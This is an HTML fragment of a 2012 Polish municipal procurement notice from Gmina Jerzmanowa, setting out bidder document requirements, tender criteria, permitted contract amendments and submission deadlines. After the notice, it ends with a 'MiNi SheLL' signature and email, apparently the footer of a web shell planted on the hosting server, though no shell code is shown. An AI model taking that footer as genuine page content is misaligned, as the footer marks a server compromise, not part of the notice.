<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony  formularz ofertowy - Załącznik nr 1 do SIWZ;
2. Pełnomocnictwo podmiotów występujących wspólnie- jeżeli dotyczy;
3. Pełnomocnictwo dla osoby podpisującej ofertę i oświadczenia - jeśli uprawnienie tej osoby nie wynika z innych dokumentów dołączonych do oferty - jeżeli dotyczy;
4. Zobowiązanie podmiotu do oddania do dyspozycji niezbędnych zasobów na okres korzystania 
z nich przy wykonywaniu zamówienia (osoby zdolne do wykonywania zamówienia) - Załącznik nr 8 do SIWZ - jeżeli dotyczy;
5. Zobowiązanie podmiotu do oddania do dyspozycji niezbędnych zasobów na okres korzystania 
z nich przy wykonywaniu zamówienia  (niezbędna wiedza i doświadczenie) - Załącznik nr 8a do SIWZ - jeżeli dotyczy;
6. Wykaz części zamówienia jakie Wykonawca zamierza powierzyć Podwykonawcom - Załącznik nr 9 do SIWZ - jeżeli dotyczy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający przewiduje możliwość wprowadzenia zmian do zawartej umowy w formie pisemnego aneksu.
2. Zamawiający dopuszcza zmianę osoby, która będzie uczestniczyć w kierowaniu pracami, wymienionej § 7 ust 1 załączonego do Specyfikacji Istotnych Warunków Zamówienia wzoru umowy stanowiącego Załącznik nr 10 do SIWZ. Zmiana taka wymaga zaakceptowania przez Zamawiającego. Akceptacja taka jest możliwa wyłącznie wówczas gdy kwalifikacje i  doświadczenie wskazanej osoby będą spełniać warunki postawione w tym zakresie w Specyfikacji Istotnych Warunków Zamówienia. W zakresie wprowadzonych zmian zostanie zawarty stosowny aneks do zawartej umowy.
3. Zmiany w umowie będą mogły nastąpić w następujących przypadkach:
3.1 zaistnienie okoliczności leżących po stronie Zamawiającego, w szczególności spowodowanych sytuacją finansową, zdolnościami płatniczymi, warunkami organizacyjnymi lub okolicznościami, które nie były możliwe do przewidzenia w chwili zawarcia umowy - może uzasadniać zmianę umowy w szczególności zmianie może ulec termin realizacji umowy. Gdy zaistnieje inna, niemożliwa do przewidzenia w momencie zawarcia umowy okoliczność prawna, ekonomiczna lub techniczna, za którą żadna ze stron nie ponosi odpowiedzialności, skutkująca brakiem możliwości należytego wykonania umowy, zgodnie ze specyfikacją istotnych warunków zamówienia - Zamawiający dopuszcza możliwość zmiany umowy, w szczególności terminu realizacji zamówienia;
3.2 termin wykonania może również zostać zmieniony w przypadku działań niezależnych, zarówno od Zamawiającego jak i Wykonawcy, których nie można było przewidzieć przy podpisywaniu umowy (np. w przypadku opóźnień spowodowanych działaniem osób trzecich, w tym innych organów decydujących o przebiegu procedury sporządzania projektów planów miejscowych); 
3.3 jeżeli w toku wykonywania umowy nastąpi zmiana prawa lub obowiązujących norm wywołujących konieczność zmiany zakresu lub programu pracy, każda ze stron ma prawo żądać odpowiedniej ich zmiany;
3.4 Ewentualny wcześniejszy termin zakończenia i przekazania poszczególnych etapów sporządzania planów traktowany będzie jako termin przekazania, określony w załącznikach do Umowy /Programach pracy/. 
4. Pozostałe zmiany:
4.1 jeśli zmiana stawki podatku VAT będzie  powodować  zwiększenie  kosztów  wykonania  po stronie  Wykonawcy, Zamawiający  dopuszcza  możliwość zwiększenia  wynagrodzenia  o kwotę równą różnicy  w kwocie  podatku  VAT  zapłaconego  przez  wykonawcę, 
4.2 jeśli  zmiana  stawki VAT  będzie powodować zmniejszenie  kosztów wykonania  umowy  po   stronie Wykonawcy, Zamawiający  przewiduje  możliwość  zmniejszenia  wynagrodzenia o kwotę stanowiącą różnicę  kwoty podatku  VAT  do zapłacenia  przez  Wykonawcę.
5. Ewentualny wcześniejszy termin zakończenia i przekazania poszczególnych etapów sporządzania planów traktowany będzie jako termin przekazania, określony w załącznikach 1,2,3 do Umowy  - /Programach Pracy/</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.jerzmanowa.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Jerzmanowa, ul. Głogowska 7, 67-222 Jerzmanowa, pokój nr 3 - Referat budownictwa i zarządu dróg.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.11.2012 godzina 08:30, miejsce: Urząd Gminy Jerzmanowa
ul. Głogowska 7
67-222 Jerzmanowa
sekretariat, pokój nr 6.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com